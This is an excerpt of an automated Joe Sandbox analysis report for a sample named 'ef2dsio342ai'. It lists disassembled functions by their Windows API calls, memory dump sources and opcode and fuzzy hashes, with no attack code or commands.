                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                      • String ID:
                                                                                                      • API String ID: 3761583154-0
                                                                                                      • Opcode ID: 673811420ba95c2c94b72c58116e9061d7e24524d04de2acfd80e46637f1d155
                                                                                                      • Instruction ID: 3ee6fe50b244d85b662626487d083c7ca8d8fa12d8dc05bb7cab72b3486e41cf
                                                                                                      • Opcode Fuzzy Hash: 673811420ba95c2c94b72c58116e9061d7e24524d04de2acfd80e46637f1d155
                                                                                                      • Instruction Fuzzy Hash: 18218371200304AFDB109FA8DC89CAA77EDEB49360754C125F909CB3A0EA70EC45DB74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00D80DAE
                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D80DEA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateHandlePipe
                                                                                                      • String ID: nul
                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                      • Opcode ID: b19135dfeea00cc4433ca47704ae478b0ef0f3e413b0fed0c2da61b8b371eb51
                                                                                                      • Instruction ID: d9bbb65ff39c253800deedc80e7d3dac8f63168fe8d3dd18fbbc413acdbe9f0b
                                                                                                      • Opcode Fuzzy Hash: b19135dfeea00cc4433ca47704ae478b0ef0f3e413b0fed0c2da61b8b371eb51
                                                                                                      • Instruction Fuzzy Hash: 7F215C71500305AFDB61AF69D804A9ABFA8EF45720F244E19F9A1D72E0D770D844CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00D80E82
                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D80EBD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateHandlePipe
                                                                                                      • String ID: nul
                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                      • Opcode ID: 04cd4475b312c5e627f9bbf00aad20912a33c59452fe2ab4309264d9236dbce2
                                                                                                      • Instruction ID: 1d2a84fa2547381e8695aaaaa90b8495b0dc39e2f8db7f47d6c3afb467ea062c
                                                                                                      • Opcode Fuzzy Hash: 04cd4475b312c5e627f9bbf00aad20912a33c59452fe2ab4309264d9236dbce2
                                                                                                      • Instruction Fuzzy Hash: 90215E71504305ABDB70AF689C04A9ABBE8EF55724F244A19FEA1E72E0D770D848CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D17759
                                                                                                        • Part of subcall function 00D1771B: GetStockObject.GDI32(00000011), ref: 00D1776D
                                                                                                        • Part of subcall function 00D1771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D17777
                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DA4A71
                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DA4A7E
                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DA4A89
                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DA4A98
                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DA4AA4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: Msctls_Progress32
                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                      • Opcode ID: b023db79e7810beafd58dfdea55f264d5efea84b83cc0d357e6f3a7d4cfbe73e
                                                                                                      • Instruction ID: 346315fc95185c226a2081e936c4f245a952cb842a90da6f27f7227c5b71daf4
                                                                                                      • Opcode Fuzzy Hash: b023db79e7810beafd58dfdea55f264d5efea84b83cc0d357e6f3a7d4cfbe73e
                                                                                                      • Instruction Fuzzy Hash: 2711B2B214021DBEEF119F64CC81EE77FADEF09758F008111BA18E61A0CA729C21DBB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D4DB43: _free.LIBCMT ref: 00D4DB6C
                                                                                                      • _free.LIBCMT ref: 00D4DBCD
                                                                                                        • Part of subcall function 00D42D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4), ref: 00D42D6E
                                                                                                        • Part of subcall function 00D42D58: GetLastError.KERNEL32(00DE1DC4,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4,00DE1DC4), ref: 00D42D80
                                                                                                      • _free.LIBCMT ref: 00D4DBD8
                                                                                                      • _free.LIBCMT ref: 00D4DBE3
                                                                                                      • _free.LIBCMT ref: 00D4DC37
                                                                                                      • _free.LIBCMT ref: 00D4DC42
                                                                                                      • _free.LIBCMT ref: 00D4DC4D
                                                                                                      • _free.LIBCMT ref: 00D4DC58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                      • Instruction ID: e288ce7e857d2fe184a0c3dab580f388ba0cb446ad274c8d47123f78209dd826
                                                                                                      • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                      • Instruction Fuzzy Hash: 8A112E71980744A7DD20FB70CC47FDBB7ADDF44700F450C25B299A6162D7A5A6854670
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 10001104
                                                                                                        • Part of subcall function 100044C6: _setlocale.LIBCMT ref: 100044D7
                                                                                                      • _free.LIBCMT ref: 10001114
                                                                                                        • Part of subcall function 100054A4: HeapFree.KERNEL32(00000000,00000000,?,1000D9D6,00000000,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 100054B8
                                                                                                        • Part of subcall function 100054A4: GetLastError.KERNEL32(00000000,?,1000D9D6,00000000,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 100054CA
                                                                                                      • _free.LIBCMT ref: 1000112B
                                                                                                      • _free.LIBCMT ref: 10001142
                                                                                                      • _free.LIBCMT ref: 10001159
                                                                                                      • _free.LIBCMT ref: 10001170
                                                                                                      • _free.LIBCMT ref: 10001187
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3515823920-0
                                                                                                      • Opcode ID: 08b30f78dfb3bccc78abe47b7370a8b88e1835717ef010bcdd3c16506d107f50
                                                                                                      • Instruction ID: 982c08d9c8c60e5ce7ef1a2885d4ecc8d8bb9aced40d8921f4d25059b128bc49
                                                                                                      • Opcode Fuzzy Hash: 08b30f78dfb3bccc78abe47b7370a8b88e1835717ef010bcdd3c16506d107f50
                                                                                                      • Instruction Fuzzy Hash: 760140F4A407005BFF60CF31D805B9BB2E8DF106E5F014928E54ACB64AEB76F5088B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D7E23D
                                                                                                      • LoadStringW.USER32(00000000), ref: 00D7E244
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D7E25A
                                                                                                      • LoadStringW.USER32(00000000), ref: 00D7E261
                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D7E2A5
                                                                                                      Strings
                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00D7E282
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                      • Opcode ID: 4cb4c8de04c18ee749e1ab041eab47dac751cf6e2af7ac5df0ac156f52396722
                                                                                                      • Instruction ID: a29e02f4192668a3245e45e5b8f24c8aea3beb24343c8a1a76fe3faed00d2e5e
                                                                                                      • Opcode Fuzzy Hash: 4cb4c8de04c18ee749e1ab041eab47dac751cf6e2af7ac5df0ac156f52396722
                                                                                                      • Instruction Fuzzy Hash: 410131F690030CBFE711ABA4DD89EEB776CDB09300F408591B74AE2541EA749E848B75
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __init_pointers.LIBCMT ref: 1000DA91
                                                                                                        • Part of subcall function 1000B4AF: EncodePointer.KERNEL32(00000000,00000000,1000DA96,10006B90,10020340,00000008,CEF76CC5,100200AC,016FF568,00000001), ref: 1000B4B2
                                                                                                        • Part of subcall function 1000B4AF: __initp_misc_winsig.LIBCMT ref: 1000B4D3
                                                                                                      • __mtinitlocks.LIBCMT ref: 1000DA96
                                                                                                        • Part of subcall function 10007CCD: InitializeCriticalSectionAndSpinCount.KERNEL32(10022500,00000FA0,10023A08,00000000,1000DA9B,10006B90,10020340,00000008,CEF76CC5,100200AC,016FF568,00000001), ref: 10007CEB
                                                                                                      • __mtterm.LIBCMT ref: 1000DA9F
                                                                                                      • __calloc_crt.LIBCMT ref: 1000DAC4
                                                                                                      • __initptd.LIBCMT ref: 1000DAE6
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1000DAED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                                      • String ID:
                                                                                                      • API String ID: 2211675822-0
                                                                                                      • Opcode ID: 00bf741576c5ae00931ddd61d5ae24093ac7f5e5789f33492fb8197f68782310
                                                                                                      • Instruction ID: f1339bc883318766b3b471920ec59669a4def8957223975b557fa7e14c64c666
                                                                                                      • Opcode Fuzzy Hash: 00bf741576c5ae00931ddd61d5ae24093ac7f5e5789f33492fb8197f68782310
                                                                                                      • Instruction Fuzzy Hash: 38F0F03621D7626AF250FB74BC0264E36D0DF022F4F21062BF064D40EDEF11A98281A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 100017E2
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 100017FA
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10001812
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throw
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 2005118841-1866435925
                                                                                                      • Opcode ID: b5dfd35a816614e07c50242ed5e50527338dbc389515814472faf93da1039c48
                                                                                                      • Instruction ID: 05e09961387010fef0b1f913e3d49bdf106bb280f35d099801ec56ae51547441
                                                                                                      • Opcode Fuzzy Hash: b5dfd35a816614e07c50242ed5e50527338dbc389515814472faf93da1039c48
                                                                                                      • Instruction Fuzzy Hash: E2F01D75C00609ABEB00DBE0DC82DEFB3BCEB043C4F904455FA15A7106D779B6468655
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00D81237
                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?), ref: 00D81249
                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00D81257
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D81265
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D81274
                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D81284
                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 00D8128B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 3495660284-0
                                                                                                      • Opcode ID: 87a42cd4c94266ed966e097b1781a8a21ffef1a2cf325b844573b64c33f36991
                                                                                                      • Instruction ID: b69131bc8dcf28d80385e094fa37af9fee8b154ca5e5507d324fbfb9ecf17b47
                                                                                                      • Opcode Fuzzy Hash: 87a42cd4c94266ed966e097b1781a8a21ffef1a2cf325b844573b64c33f36991
                                                                                                      • Instruction Fuzzy Hash: 40F01972042B12BBD7511B64EE49BE6BB3AFF02302F442025F102D1DA0C7749466CFA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 00D1743D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00D1747E
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00D174A6
                                                                                                      • GetClientRect.USER32(?,?), ref: 00D175E4
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00D17605
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1296646539-0
                                                                                                      • Opcode ID: ab969d7f0c13a17c6a1dd5c389f5ea9576fdc65bf32b17ea1329c6a702a9301d
                                                                                                      • Instruction ID: 2c12a224684550eeb3452708094fa33b781288ee4ae0e60a7daf35add9484654
                                                                                                      • Opcode Fuzzy Hash: ab969d7f0c13a17c6a1dd5c389f5ea9576fdc65bf32b17ea1329c6a702a9301d
                                                                                                      • Instruction Fuzzy Hash: 90B15B74A0474AEBDB10CFA9C4406EAB7F2FF54310F18851AECAAD3250DB34E995DB64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __allrem.LIBCMT ref: 00D4044A
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D40466
                                                                                                      • __allrem.LIBCMT ref: 00D4047D
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D4049B
                                                                                                      • __allrem.LIBCMT ref: 00D404B2
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D404D0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1992179935-0
                                                                                                      • Opcode ID: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                                                                                      • Instruction ID: 1edc3857e9bed5d637031a922fa82133f08e9c9a87fd3084f026b95b84a078f1
                                                                                                      • Opcode Fuzzy Hash: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                                                                                      • Instruction Fuzzy Hash: F2811972A007069BE724AE78CC81B6A7BE8EF55324F28412EF755D7691E770DD008BB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D93AA6: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00D91979,00000000,?,?,00000000), ref: 00D93AF2
                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00D9271D
                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D9273E
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D9274F
                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00D927E9
                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00D92838
                                                                                                      • _strlen.LIBCMT ref: 00D92892
                                                                                                        • Part of subcall function 00D74277: _strlen.LIBCMT ref: 00D74281
                                                                                                        • Part of subcall function 00D186FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00D2C15A,?,?,?), ref: 00D1871A
                                                                                                        • Part of subcall function 00D186FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00D2C15A,?,?,?,?,00D1AEB9,?,?), ref: 00D1874D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                      • String ID:
                                                                                                      • API String ID: 1923757996-0
                                                                                                      • Opcode ID: 36e4aaf4511f9b4a461683cf886e09a232cf2527480697dd36019c62549eb78c
                                                                                                      • Instruction ID: bd1122f1194df9722b2fc018184184c34c374fdbb722e37c295f7df1d0955062
                                                                                                      • Opcode Fuzzy Hash: 36e4aaf4511f9b4a461683cf886e09a232cf2527480697dd36019c62549eb78c
                                                                                                      • Instruction Fuzzy Hash: 65A1BD35204300BFC714DF24D895E6ABBA5EF94318F58854CF49A9B2A2CB31ED85CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D38669,00D38669,?,?,?,00D467DF,00000001,00000001,8BE85006), ref: 00D465E8
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D467DF,00000001,00000001,8BE85006,?,?,?), ref: 00D4666E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D46768
                                                                                                      • __freea.LIBCMT ref: 00D46775
                                                                                                        • Part of subcall function 00D43BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D36A99,?,0000015D,?,?,?,?,00D385D0,000000FF,00000000,?,?), ref: 00D43BE2
                                                                                                      • __freea.LIBCMT ref: 00D4677E
                                                                                                      • __freea.LIBCMT ref: 00D467A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
